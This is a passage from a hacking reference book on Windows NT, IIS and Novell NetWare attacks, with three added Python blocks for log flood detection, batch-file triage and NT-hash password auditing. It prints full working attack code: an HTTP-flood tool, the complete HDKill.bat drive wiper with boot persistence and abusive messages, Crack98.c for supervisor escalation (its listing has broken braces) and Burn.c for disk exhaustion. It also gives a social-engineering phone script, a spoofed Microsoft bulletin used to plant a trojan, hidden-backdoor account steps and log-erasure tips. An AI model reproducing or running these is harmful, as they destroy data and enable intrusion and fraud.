
Hack Attacks Revealed: A Complete Reference with Custom Security Hacking Toolkit, part 8




568


Figure 10.9 DoS implications of the telnet hack attack.

Figure 10.10 Dr. Watson to the rescue.
At this point, IIS could immediately crash, or crash upon scheduled administrative service
interruptions—essentially, upon administrative shutdown and/or service restart. The destructive
requests include the following URLs:
• www.victim.com/Scripts/Tools/Newdsn.exe?Createdatabase
• www.victim.com/Scripts/Tools/Newdsn.exe?Create
Severe Congestion
Synopsis: Custom HTTP request saturation can cause severe resource degradation.
Hack State: CPU congestion.



Vulnerabilities: Win NT 3x, 4, and Internet Information Server version 3, 4, 5.
Breach: Using a simple underground IIS attack software module (see Figure 10.11) that has been
programmed for an unlimited hit count, a remote attacker can cause severe CPU congestion,
resulting in resource degradation and, ultimately, potential service denial. The program shown here
was written in Visual Basic and includes only a single form (see Figure 10.12).

Figure 10.11 IIS attack via custom HTTP request saturation.

Figure 10.12 VB form for Main.frm.




main.frm
Private Stopper&
Private Sub Command1_Click()
On Error GoTo ErrorHandler
If Command1.Caption = "begin" Then
If IsNumeric(Text2.Text) = False Then MsgBox "Please enter a valid amount!", vbExclamation, "": Text2.Text = "0": Exit Sub
Command1.Caption = "stop"
Text3.Visible = True
For a = 1 To Text2.Text
If Stopper& = 1 Then Exit Sub
Do While Inet1.StillExecuting
DoEvents
Loop
Inet1.Execute Text1.Text, "GET " & Text1.Text
Text3.Text = Text3.Text + 1
Next a
Else
Stopper& = 1
Command1.Caption = "begin"
Text3.Visible = False
End If
Exit Sub
ErrorHandler:
MsgBox "Please enter a valid web server!", vbInformation, ""
Exit Sub
End Sub
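As an added defensive example (not from the book or the tool it describes), the saturation loop above leaves a plain signature in IIS's own W3C log: one client address repeating GETs far faster than a browser would. The log excerpt, the client addresses and the threshold are constructed:

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed IIS 4.0 W3C extended log excerpt (not a real capture). Two clients
# browse at a normal pace; 192.0.2.10 repeats GET /default.htm the way the VB
# loop above does, 10 requests per second for 4 seconds.
_NORMAL = [
    "2000-10-10 18:09:00 10.0.0.5 GET /default.htm 200",
    "2000-10-10 18:09:04 10.0.0.7 GET /index.htm 200",
    "2000-10-10 18:09:09 10.0.0.5 GET /images/logo.gif 200",
    "2000-10-10 18:09:15 10.0.0.7 GET /products.htm 200",
]
_FLOOD = [f"2000-10-10 18:09:{sec:02d} 192.0.2.10 GET /default.htm 200"
          for sec in range(10, 14) for _ in range(10)]
SAMPLE_LOG = "\n".join(
    ["#Software: Microsoft Internet Information Server 4.0",
     "#Fields: date time c-ip cs-method cs-uri-stem sc-status"]
    + sorted(_NORMAL + _FLOOD))


def parse_iis_log(text):
    """Yield (timestamp, client_ip, method, uri, status) per data line, skipping #directives."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        date, clock, ip, method, uri, status = line.split()
        yield datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S"), ip, method, uri, int(status)


def find_floods(entries, window=timedelta(seconds=10), threshold=30):
    """Return {client_ip: peak requests inside any `window`} for clients over `threshold`.

    A per-client sliding window: a tight GET loop piles dozens of hits into a
    few seconds, while a browser, even one fetching images, stays under the bar.
    """
    recent, peak = defaultdict(deque), defaultdict(int)
    for ts, ip, _m, _u, _s in sorted(entries, key=lambda e: e[0]):
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:        # drop hits that fell out of the window
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: n for ip, n in peak.items() if n > threshold}


def flood_report(log_text=SAMPLE_LOG, **kw):
    return find_floods(parse_iis_log(log_text), **kw)


if __name__ == "__main__":
    for ip, n in flood_report().items():
        print(f"{ip}: {n} requests inside a 10 s window")
```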
System Control

The purpose of this section is to re-create a common system control attack on Win NT servers.
Attacks like this one against IT staff happen almost every day. For simplicity, this hack is broken into
a few effortless steps:
Step 1: The Search
In this step, the attacker chooses an IT staff victim. Whether the attacker already knows the victim or
searches the victim’s company Web site, it takes very little effort to perform some social engineering
to reveal a target email address. Remarkably, some sites actually post IT staff support email
addresses, and more remarkably, individual names, addresses, and even photos.
This sample social engineering technique was like taking candy from a baby:
• Hacker: “Good morning; my name is Joe Hacker from Microsoft. Please transfer me to your
IT department. They are expecting my call as I am responding to a support call, ticket number
110158.”
• Reception: “Oh, okay. Do you have the name of the person you are trying to reach?”
• Hacker: “No, sorry… The caller didn’t leave a name… wait, let me check… (sound of
hacker typing on the keyboard). Nope, only this contact number.”
• Reception: “I’ll transfer you to Tom; he’s in IT. He’ll know who to transfer you to.”
• Tom: “Hello?”
• Hacker: “Good morning, Tom; my name is Joe Hacker, from Microsoft support. I’m
responding to a support call, ticket number 110158, and I’m making this call to put your staff
on our automated NT security alert list.”



• Tom: “Whom were you trying to reach?”
• Hacker: “Our terminals are down this morning; all I have is this contact number. All I need
is an IT staff email address to add to our automated NT security alert list. When new patches
are available for any substantiated NT vulnerabilities, the recipient will receive updates.
Currently, three new patches are available in queue. Also… ” (interrupted)
• Tom: “Cool; it’s a pain trying to keep up with these patches.”
• Hacker: “It says here your primary Web server is running IIS. Which version is it?”
• Tom: “Believe it or not, it’s 3.0. We’re completely swamped, so we’ve put this on the back
burner. You can use my address for the advisories; it’s ”
• Hacker: “Consider it done, ticket closed. Have a nice day.”
Step 2: The Alert
During this step, the attacker decides on the remote-control daemon and accompanying message. In
this particular case, the attacker chose phAse Zero:
Port: 555, 9989
Service: Ini-Killer, NeTAdmin, phAse Zero, Stealth Spy
Hacker’s Strategy: Aside from spy features and file transfer, the most important purpose of these
Trojans is to destroy the target system. The only saving grace is that these daemons can only infect a
system upon execution of setup programs that need to be run on the host.
Using a mail-spoofing program, as mentioned earlier in this book, the attacker’s message arrived
(spoofed from Microsoft):
>On 10 Oct 2000, at 18:09, wrote:
>
>Issue
>=====
>This vulnerability involves the HTTP GET method, which is used to obtain
>information from an IIS Web server. Specially malformed GET requests can
>create a denial-of-service situation that consumes all server resources,
>causing a server to “hang.” In some cases, the server can be put back into
>service by stopping and restarting IIS; in others, the server may need to
>be rebooted. This situation cannot happen accidentally. The malformed GET
>requests must be deliberately constructed and sent to the server. It is
>important to note that this vulnerability does not allow data on the
>server to be compromised, nor does it allow any privileges on it to be usurped.




>
>Affected Software Versions
>==========================
> - Microsoft Internet Information Server, version 3.0 and 4.0, on x86 and
>Alpha platforms.
>
>What Customers Should Do
>========================
>The attached patch for this vulnerability is fully supported and should be applied
> immediately, as all systems are determined to be at risk of attack. Microsoft recommends
>that customers evaluate the degree of risk that this vulnerability poses to their systems,
>based on physical accessibility, network, and Internet connectivity, and other factors.
>
>
>Obtaining Support on This Issue
>===============================
>This is a supported patch. If you have problems installing
>this patch, or require technical assistance with this patch,
>please contact Microsoft Technical Support. For information
>on contacting Microsoft Technical Support, please see
>
>
>
>Revisions
>=========
> - October 10, 2000: Bulletin Created
>




>
>For additional security-related information about Microsoft products,
>please visit
>
>
>
>
>THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS-IS"
>WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
>EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND
>FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
>SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
>INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
>EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
>POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
>LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
>FOREGOING LIMITATION MAY NOT APPLY.
>
>(c) 2000 Microsoft Corporation. All rights reserved. Terms of Use.
>
> *******************************************************************

>You have received this email bulletin as a result of your registration
>to the Microsoft Product Security Notification Service. You may



>unsubscribe from this email notification service at any time by sending
>an email to MICROSOFT_SECURITY-SIGNOFF-

>The subject line and message body are not used in processing the request,
>and can be anything you like.
>
>For more information on the Microsoft Security Notification Service
>please visit For
>security-related information about Microsoft products, please visit the
>Microsoft Security Advisor Web site at
Step 3: Another Successful Victim
During this step, the attacker simply waits a few days before exercising complete remote control with
the phAse zero client, as shown in Figure 10.13.

Figure 10.13 Complete control with phAse Zero.

Miscellaneous Mayhem
Windows 3x, 9x, 2000
Hack State: Hard drive obliteration.
File: HDKill.bat.
Synopsis: Some hackers enjoy generating havoc among their victims. This nasty hard-drive killer,
for example, has been attached to countless emails and distributed with game evaluations as a
ReadMe.bat file. In other cases, hackers go to the trouble of breaking into systems only to add this
file to the system bootup process. Careful inspection of the code will reveal its purpose.
Hdkill.bat
@echo off
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS…
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul

set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS…
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS…

echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS…
echo :enddc >>drivechk.bat
:testdrv
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
del drivechk.bat >nul
:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. >>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following… >>c:\autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat
echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! >>c:\autoexec.bat
echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. >>c:\autoexec.bat
echo echo 4. If you are Australian, I feel sorry for you, accept my sympathy, you retard. >>c:\autoexec.bat
echo echo 5. Don't support the following: War, Racism, Drugs and the Liberal Party.>>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat



:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a >>c:\temp.bat
echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul
cls
echo Initializing Variables…
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
cls
echo Initializing Variables…
echo Validating Data…
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Initializing Variables…
echo Validating Data…
echo Analyzing System Structure…
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
echo Initializing Variables…
echo Validating Data…
echo Analyzing System Structure…

echo Initializing Application…
for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
echo Initializing Variables…
echo Validating Data…
echo Analyzing System Structure…
echo Initializing Application…
echo Starting Application…
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Thank you for using a Munga Bunga product.
echo.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.
echo.
echo Here is a joke for you…



echo.
echo Q). What's the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo HAHAHAHA, get it? Don't you just love that one?
echo.
:end
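The text says careful inspection reveals the file's purpose; as an added example (not from the book), here is that inspection done mechanically: a small static triage that flags the unattended FORMAT and DELTREE commands and the AUTOEXEC.BAT rewrite that gives the file its persistence across reboots. The batch excerpt and the rule names are constructed:

```python
import re

# Constructed excerpt modelled on HDKill.bat's structure (not the full file):
# a fake "please wait" banner, an AUTOEXEC.BAT rewrite so the wipe reruns at
# boot, and unattended FORMAT / DELTREE over every drive found.
SAMPLE_BAT = r"""@echo off
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS...
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
for %%a in (%drive%) call deltree /y %%a:\*. >nul
echo Thank you for using a Munga Bunga product.
"""

# (rule name, pattern, why it matters). /autotest and /y are the switches that
# suppress the confirmation prompt, which is what makes these lines dangerous.
RULES = [
    ("unattended-format", re.compile(r"\bformat\s+\S+.*?/autotest\b", re.I),
     "FORMAT with /autotest wipes a volume without prompting"),
    ("silent-deltree", re.compile(r"\bdeltree\s+/y\b", re.I),
     "DELTREE /Y removes a whole tree without confirmation"),
    ("autoexec-rewrite", re.compile(r">>?\s*c:\\autoexec\.bat", re.I),
     "writes or appends to AUTOEXEC.BAT, so the payload reruns at next boot"),
    ("hide-autoexec", re.compile(r"\battrib\s+\+r\s+\+h\s+c:\\autoexec\.bat", re.I),
     "sets AUTOEXEC.BAT read-only and hidden to conceal the tampering"),
    ("decoy-banner", re.compile(r"\becho\s+PLEASE WAIT WHILE PROGRAM LOADS", re.I),
     "status text shown to the user while the destructive commands run"),
]


def triage_batch(text):
    """Return {rule_name: [line numbers]} for every rule that matches the batch file."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern, _why in RULES:
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def verdict(hits):
    """'destructive' when a wipe is paired with boot persistence, 'suspicious' for a wipe alone."""
    wipes = {"unattended-format", "silent-deltree"} & hits.keys()
    if wipes and "autoexec-rewrite" in hits:
        return "destructive"
    return "suspicious" if wipes else "clean"


def explain(hits):
    """One human-readable report line per matched rule."""
    why = {name: reason for name, _p, reason in RULES}
    return [f"{name} (lines {', '.join(map(str, lines))}): {why[name]}"
            for name, lines in hits.items()]


if __name__ == "__main__":
    found = triage_batch(SAMPLE_BAT)
    print(verdict(found))
    print("\n".join(explain(found)))
```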
Hack State: Password theft.
File: ProgenicMail.zip.
Synopsis: Hackers use the ProgenicMail technique to dupe victims into sending all cached system
passwords. The program operates in a simple fashion, better explained on a per-file basis:
• Psetup.dat. This file contains the custom configurations options:
[Setup]
Mail=(email address to forward passwords to)
Data=ProgenicMail (if left blank, the program will send passwords upon each execution)
• setup.dll. This file can be replaced with any .exe to be loaded to hide the true purpose of the
attack. For example, the attacker may rename a joke.exe as setup.dll. The program will then
launch setup.dll (really joke.exe) as it forwards all system passwords to the attacker.
Hack State: Unrecoverable file deletion.
File: FFK.exe.
Synopsis: After penetrating a system, hackers will attempt to delete logs and any evidence that could
be traced back to them with an unrecoverable file deletion utility. The purpose of this program, by
PhrozeN, is to permanently delete files very fast. For example, with Fast File Killer (shown in Figure
10.14), 4,000 files of 3–150 KB take only about 30–60 seconds to delete, and the action all takes
place in the background while other tasks are performed. These utilities are typically coded to
remove files completely, through numerous deletion passes or by scrambling their contents.

Figure 10.14 Fast File Killer in action.

Figure 10.15 Password cracking with NTCrack.
Windows NT
Hack State: Brute-force password cracking.
File: NTCrack.exe.
Synopsis: NTCrack is a common Underground password cracker for NT. Operating remotely or
locally, an attacker can supply custom dictionaries for the username and/or password of the
attempted logon. What’s unique with this particular tool is the speed at which simulated logons can be
attempted (see Figure 10.15).
Hack State: Administrative privileges exploitation.
File: NTAdmin.exe.
Synopsis: Local attackers exploit vulnerable NT guest accounts with NTAdmin. This Underground
enigma has been coded to modify general user/guest accounts on an NT domain to acquire privileged
administrative rights. The captures shown in Figure 10.16, before and after the exploit, illustrate the
group modifications from guests to administrators.
Other Exposure
This section concludes with a compilation of Underground Microsoft NT hack attacks.

This section was prepared with help from the Nomad Mobile Research Centre
(NMRC), in particular: Simple Nomad and contributors: Shadowlord, Mindgame,
The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Einar
Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller.





Figure 10.16 Hacking with NTAdmin.
Common Accounts
Two accounts typically come with NT: administrator and guest. In numerous network environments,
unpassworded admin and guest accounts have been unveiled. It is possible, however, that the system
administrator has renamed the administrator account. Hackers know that typing “NBTSTAT -A
ipaddress” reveals the new administrator account.
Passwords
• Accessing the password file. The NT security database is located in
\\WINNT\SYSTEM32\CONFIG\SAM. By default, the SAM is readable, but locked since it
is in use by system components. It is possible, however, that there are SAM.SAV files that
could be read to obtain password information.
• More on cracking passwords. A standard Windows NT password is derived by converting
the user’s password to Unicode, then using MD4 to get a 16-byte value; the hash value is the
actual NT “password.’’ In order to crack NT passwords, the username and the corresponding
one-way hashes need to be extracted from the password database. This process can be
painless, by using hacker/programmer Jeremy Allison’s PWDUMP, coupled with a
password-cracking program as defined earlier in this chapter.
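As an added example (not from the book, nor from Allison's PWDUMP or any cracker it mentions), the hash the text describes computed directly, and the audit that follows from its being unsalted: a defender who dumps their own SAM can spot blank, dictionary and reused passwords by hashing a short word list once. The account names, passwords and word list are constructed:

```python
import struct
from collections import defaultdict

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, inlined because hashlib's md4 is often unavailable under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        # Each round rotates (a, b, c, d) after every step so one statement serves all 16 steps.
        for i, s in zip(range(16), [3, 7, 11, 19] * 4):
            a = _rotl((a + F(b, c, d) + X[i]) & MASK32, s)
            a, b, c, d = d, a, b, c
        for i, s in zip([0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], [3, 5, 9, 13] * 4):
            a = _rotl((a + G(b, c, d) + X[i] + 0x5A827999) & MASK32, s)
            a, b, c, d = d, a, b, c
        for i, s in zip([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], [3, 9, 11, 15] * 4):
            a = _rotl((a + H(b, c, d) + X[i] + 0x6ED9EBA1) & MASK32, s)
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """The NT hash exactly as the text describes it: MD4 over the Unicode (UTF-16LE) password, no salt."""
    return md4(password.encode("utf-16-le")).hex()


# Constructed pwdump-style entries (user, NT hash); no real accounts or dumps.
SAMPLE_DUMP = [
    ("Administrator", nt_hash("Winter2000!")),
    ("tom",           nt_hash("Winter2000!")),     # reused the admin password
    ("Guest",         nt_hash("")),                # blank password
    ("svc_web",       nt_hash("password")),
    ("svc_backup",    nt_hash("r7#Lq9!vB2xZ")),
]
WEAK_WORDS = ["", "password", "Password1", "admin", "guest", "letmein"]


def audit_dump(dump=SAMPLE_DUMP, wordlist=WEAK_WORDS):
    """Return {user: finding} for blank or dictionary passwords and for hashes shared
    between accounts. Because the NT hash has no salt, one table of hash(word)
    covers every account, and equal hashes mean equal passwords."""
    table = {nt_hash(w): w for w in wordlist}
    owners = defaultdict(list)
    findings = {}
    for user, h in dump:
        h = h.lower()
        owners[h].append(user)
        if h in table:
            findings[user] = "blank password" if table[h] == "" else f"dictionary word {table[h]!r}"
    for h, users in owners.items():
        if len(users) > 1:
            for u in users:
                others = ", ".join(x for x in users if x != u)
                findings.setdefault(u, f"same password as {others}")
    return findings


if __name__ == "__main__":
    for user, why in audit_dump().items():
        print(f"{user}: {why}")
```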



From the Console
• Information gathering. From the console on a domain controller, hackers use the following
simple steps to get a list of accounts on the target machine. With a list of user accounts, they
can target individual attacks:
1. From the User Manager, create a trusting relationship with the target.
2. Launch NT Explorer, and right-click on any folder.
3. Select Sharing.
4. From the Shared window, select Add.
5. From the Add menu, select the target NT server. This will reveal the entire group listing of
the target.
6. Select Show Users to see the entire user listing, including full names and descriptions.
Novell NetWare
Novell, Inc. (www.novell.com) is a leading provider of system operation software for all types of
corporate and private networks including intranets, extranets, and the Internet. Quickly climbing the
corporate usage ladder since 1983, Novell NetWare currently is being used in 81 percent of Fortune
500 companies in the United States (according to Harte Hanks Market Intelligence). The company
boasts greater security provision throughout the Net while accelerating e-business transformations.

Liabilities
Getting In
Hacking the Console
Synopsis: Simple techniques can facilitate console breaches.
Hack State: Administrative privileges exploitation.
Vulnerabilities: All flavors prior to version 4.11.
Breach: When NetWare administrators load NetWare loadable modules (NLMs) remote.nlm and
rspx.nlm, hackers seek a program titled rconsole.exe, typically from the //public directory. At this
point, and on the same address scheme as the administrator and/or target server, the hacker loads an
IPX packet sniffer and waits to capture the system password. Among hackers, a popular sniffer
package is SpyNet (Chapter 8 describes this package more fully). If the attacker wants to conceal
evidence of the hack, he or she erases the system log from //etc/console.log by unloading and
reloading the conlog.nlm. This starts a new log capture file over the old one, which contains the
evidence.
Stealing Supervisory Rights
Synopsis: Custom coding can modify a standard login account to have supervisor equivalence.
Hack State: Administrative privileges exploitation.
Vulnerabilities: NetWare 2x, 3x, 4x, IntraNetWare 4x.
Breach: The tempting challenge of any local hacker on a Novell network is to gain supervisory
rights. Crack98.c by renowned hacker Mnemonic sets the connection to 0 for supervisor, then creates
a user object in the bindery, which must have an equivalent property. At that point, the program adds
supervisor equivalent to the supervisor equivalence property, which gives the account supervisor
status.
Crack98.c
#include <stdio.h>
#include <io.h>
#include <fcntl.h>
#include <string.h>
#include <stddef.h>
#include <errno.h>
#include <direct.h>
#include <nwtypes.h>
#include <nwbindry.h>
#include <dos.h>
main(int argc, char *argv[])
{
long task;
char *account;
printf("Crack 98 written by Mnemonic\n");
task = SetCurrentTask(-1L);
SetCurrentConnection(0);   /* connection 0 is the supervisor connection */
account = argv[1];
while (argc > 1)
{
/* create the user object in the bindery */
if (CreateBinderyObject(account, OT_USER, BF_STATIC, 0x31) == 0)
printf("The account %s has been created\n", account);
else
printf("The account %s already exists on the network\n", account);
/* the object needs a SECURITY_EQUALS set property before it can be made equivalent */
CreateProperty(account, OT_USER, "SECURITY_EQUALS", BF_STATIC | BF_SET, 0x32);
if (AddBinderyObjectToSet(account, OT_USER, "SECURITY_EQUALS", "SUPERVISOR", OT_USER) == 0)
printf("The account %s has been made supervisor equivalent\n", account);
else
printf("The account is already supervisor equivalent\n");
}
printf("You must enter an account name\n");
account = argv[1];
}
ReturnBlockOfTasks(&task, 1L);
ReturnConnection(GetCurrentConnection());
return 0;
}
Unveiling Passwords
Synopsis: Inside and local hackers can attempt to reveal common passwords.
Hack State: Password theft.



Vulnerabilities: All flavors prior to 4.1.
Breach: NetCrack (Figure 10.17), by Jim O’Kane, attempts to divulge user passwords using legal
queries: repeated “demon dialer” calls to the VERIFY_PASSWORD function of NetWare’s bindery
commands.
Format: NETCRACK <UserID>
Common user accounts in NetWare and affiliated hardware partners include:
PRINT        WANGTEK
LASER        FAX
HPLASER      FAXUSER
PRINTER      FAXWORKS
LASERWRITER  TEST
POST         ARCHIVIST
MAIL         CHEY_ARCHSVR
GATEWAY      WINDOWS_PASSTHRU
GATE         ROOT
ROUTER       WINSABRE
BACKUP       SUPERVISOR

Figure 10.17 Hacking with NetCrack.
System Control
Backdoor Installation
Synopsis: After gaining administrative access, hackers follow a few simple steps to install a
backdoor.



Hack State: Remote control.
Vulnerabilities: NetWare NDS.
Breach: After gaining access control to the NetWare O/S, hackers attempt to install a remote-control
backdoor that may go unnoticed for some time. There are six simple steps to initiate this process:
1) In NWADMIN, highlight an existing container.
2) Create a new container inside this container.
3) Create a user inside this new container.
a) Allow full trustee rights to this user’s own user object.
b) Allow this user full trustee rights to the new container.
c) Give this user supervisory equivalence.
4) Modify the Access Control List (ACL) for the new user so that he or she cannot be seen.
5) Adjust the Inherit Rights Filter on the new container so it cannot be seen.
6) Place the new container in the IT group container to install the backdoor and to enable its login to
show up in the normal tools that show active connections.
Locking Files
Synopsis: Inside and local hackers can wreak havoc by modifying file usability.
Hack State: File control.
Vulnerabilities: NetWare 2x, 3x, 4x, IntraNetWare 4x.
Breach: After gaining access to NetWare, some hackers are keen on causing chaos by locking files.
This hack attack, associated with a program called Bastard by The Grenadier (Underground
hacker/programmer) (Figure 10.18), is popular among disgruntled employees. Basically, upon
execution, the program simply asks for the path to a file for lockdown modifications. At that point,
no other user can open the file for use until the attacker closes Bastard.exe, logs off, or shuts down.
When critical O/S operational files fall victim to this exploit, it brings networks to their knees. The
program is almost too simple to use: the only requirement is that the attacker have Read access to
the target file.


Figure 10.18 Locking files with Bastard.
Miscellaneous Mayhem
Disappearing Disk Usage
Synopsis: Hackers can crash hard drives by filling up all available space.



Hack State: System crash.
Vulnerabilities: NetWare 2/3.
Breach: Burn.c, by the infamous hacker Jitsu-Disk, depletes available disk space by erroneously
filling up an error log file at the rate of 1 MB per minute. Remnants of this particular attack may be
found on many older NetWare systems. Apparently, the attacker does not have to be logged in to
execute this utility.
Burn.c
#include <dos.h>
#include <stdlib.h>   /* calloc */
typedef unsigned int uint8;

/* issue a NetWare shell request: function f, request buffer req (rl bytes), answer buffer ans (al bytes) */
int shreq(int f, uint8 *req, int rl, uint8 *ans, int al)
{
union REGS r;
r.w.cx=rl;
r.w.dx=al;
r.w.si=((unsigned)(req));
r.w.di=((unsigned)(ans));
r.w.ax=0xf200|f;
int86(0x21,&r,&r);
return(r.w.ax&0xff);
}

int setconn(int c) /* connect to first server */
{
union REGS r;
r.w.ax=0xf000; /* set preferred connection nr */
r.w.dx=c+1;
int86(0x21,&r,&r);
return(r.w.ax&0xff);
}

/*
* Main prog
*/
int main()
{ int err;
uint8 *nonsense=(uint8 *)calloc(1,sizeof(uint8)*128);
err=setconn(0);
for(;;) shreq(74,nonsense,5,nonsense,0); /* never returns: each request adds to the server's error log */
}
Other Exposure
This section concludes with a compilation of Underground Novell NetWare hack attacks.

This section was prepared with help from the Nomad Mobile Research Centre
(NMRC), in particular: Simple Nomad and contributors: Shadowlord, Mindgame,
The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Einar
Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller.



Accounts
• Distinguishing valid account names on Novell NetWare. Any limited account should have
enough access to allow you to run SYSCON, located in the SYS:PUBLIC directory. Once in,
type SYSCON and enter. Go to User Information to see a list of all defined accounts. You
will not see much information with a limited account, but you can get the account and the
user’s full name. If you’re in with any validity, you can run USERLST.EXE and get a list of
all valid accounts on the server.
